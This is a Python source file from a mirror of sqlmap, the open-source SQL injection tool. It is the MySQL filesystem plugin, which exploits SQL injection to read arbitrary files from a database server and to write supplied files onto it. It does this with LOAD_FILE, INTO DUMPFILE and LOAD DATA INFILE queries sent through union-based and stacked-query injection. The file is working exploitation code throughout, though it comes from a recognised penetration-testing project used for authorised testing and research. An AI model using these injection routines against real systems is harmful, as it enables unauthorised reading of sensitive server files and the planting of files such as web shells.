mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-24 02:23:45 +03:00
148 lines
5.6 KiB
Python
148 lines
5.6 KiB
Python
|
#!/usr/bin/env python
|
||
|
|
||
|
"""
|
||
|
$Id$
|
||
|
|
||
|
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
||
|
|
||
|
Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||
|
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
|
||
|
|
||
|
sqlmap is free software; you can redistribute it and/or modify it under
|
||
|
the terms of the GNU General Public License as published by the Free
|
||
|
Software Foundation version 2 of the License.
|
||
|
|
||
|
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
||
|
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||
|
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||
|
details.
|
||
|
|
||
|
You should have received a copy of the GNU General Public License along
|
||
|
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
||
|
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||
|
"""
|
||
|
|
||
|
from lib.core.common import randomStr
|
||
|
from lib.core.data import conf
|
||
|
from lib.core.data import kb
|
||
|
from lib.core.data import logger
|
||
|
from lib.core.exception import sqlmapNoneDataException
|
||
|
from lib.request import inject
|
||
|
from lib.techniques.inband.union.test import unionTest
|
||
|
from lib.techniques.inband.union.use import unionUse
|
||
|
|
||
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||
|
|
||
|
class Filesystem(GenericFilesystem):
|
||
|
def __init__(self):
|
||
|
GenericFilesystem.__init__(self)
|
||
|
|
||
|
def unionReadFile(self, rFile):
|
||
|
infoMsg = "fetching file: '%s'" % rFile
|
||
|
logger.info(infoMsg)
|
||
|
|
||
|
result = inject.getValue("SELECT HEX(LOAD_FILE('%s'))" % rFile)
|
||
|
|
||
|
return result
|
||
|
|
||
|
def stackedReadFile(self, rFile):
|
||
|
infoMsg = "fetching file: '%s'" % rFile
|
||
|
logger.info(infoMsg)
|
||
|
|
||
|
self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
|
||
|
self.getRemoteTempPath()
|
||
|
|
||
|
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
|
||
|
|
||
|
debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile
|
||
|
debugMsg += "into temporary file '%s'" % tmpFile
|
||
|
logger.debug(debugMsg)
|
||
|
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile))
|
||
|
|
||
|
debugMsg = "loading the content of hexadecimal encoded file "
|
||
|
debugMsg += "'%s' into support table" % rFile
|
||
|
logger.debug(debugMsg)
|
||
|
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
|
||
|
|
||
|
length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), sort=False, resumeValue=False, charsetType=2)
|
||
|
|
||
|
if not length.isdigit() or not len(length) or length in ( "0", "1" ):
|
||
|
errMsg = "unable to retrieve the content of the "
|
||
|
errMsg += "file '%s'" % rFile
|
||
|
raise sqlmapNoneDataException, errMsg
|
||
|
|
||
|
length = int(length)
|
||
|
sustrLen = 1024
|
||
|
|
||
|
if length > sustrLen:
|
||
|
result = []
|
||
|
|
||
|
for i in range(1, length, sustrLen):
|
||
|
chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, sort=False, resumeValue=False, charsetType=3)
|
||
|
|
||
|
result.append(chunk)
|
||
|
else:
|
||
|
result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), sort=False, resumeValue=False, charsetType=3)
|
||
|
|
||
|
return result
|
||
|
|
||
|
def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
|
||
|
logger.debug("encoding file to its hexadecimal string value")
|
||
|
|
||
|
fcEncodedList = self.fileEncode(wFile, "hex", True)
|
||
|
fcEncodedStr = fcEncodedList[0]
|
||
|
fcEncodedStrLen = len(fcEncodedStr)
|
||
|
|
||
|
if kb.injPlace == "GET" and fcEncodedStrLen > 8000:
|
||
|
warnMsg = "the injection is on a GET parameter and the file "
|
||
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||
|
warnMsg += "bytes, this might cause errors in the file "
|
||
|
warnMsg += "writing process"
|
||
|
logger.warn(warnMsg)
|
||
|
|
||
|
unionTest()
|
||
|
|
||
|
oldParamFalseCond = kb.unionFalseCond
|
||
|
kb.unionFalseCond = True
|
||
|
|
||
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
|
||
|
logger.debug(debugMsg)
|
||
|
|
||
|
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
|
||
|
unionUse(sqlQuery, direct=True, unescape=False, nullChar="''")
|
||
|
|
||
|
kb.unionFalseCond = oldParamFalseCond
|
||
|
|
||
|
if confirm:
|
||
|
self.askCheckWrittenFile(wFile, dFile, fileType)
|
||
|
|
||
|
def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
|
||
|
debugMsg = "creating a support table to write the hexadecimal "
|
||
|
debugMsg += "encoded file to"
|
||
|
logger.debug(debugMsg)
|
||
|
|
||
|
self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
|
||
|
|
||
|
logger.debug("encoding file to its hexadecimal string value")
|
||
|
fcEncodedList = self.fileEncode(wFile, "hex", False)
|
||
|
|
||
|
debugMsg = "forging SQL statements to write the hexadecimal "
|
||
|
debugMsg += "encoded file to the support table"
|
||
|
logger.debug(debugMsg)
|
||
|
|
||
|
sqlQueries = self.fileToSqlQueries(fcEncodedList)
|
||
|
|
||
|
logger.debug("inserting the hexadecimal encoded file to the support table")
|
||
|
|
||
|
for sqlQuery in sqlQueries:
|
||
|
inject.goStacked(sqlQuery)
|
||
|
|
||
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
|
||
|
logger.debug(debugMsg)
|
||
|
|
||
|
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
|
||
|
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True)
|
||
|
|
||
|
if confirm:
|
||
|
self.askCheckWrittenFile(wFile, dFile, fileType)
|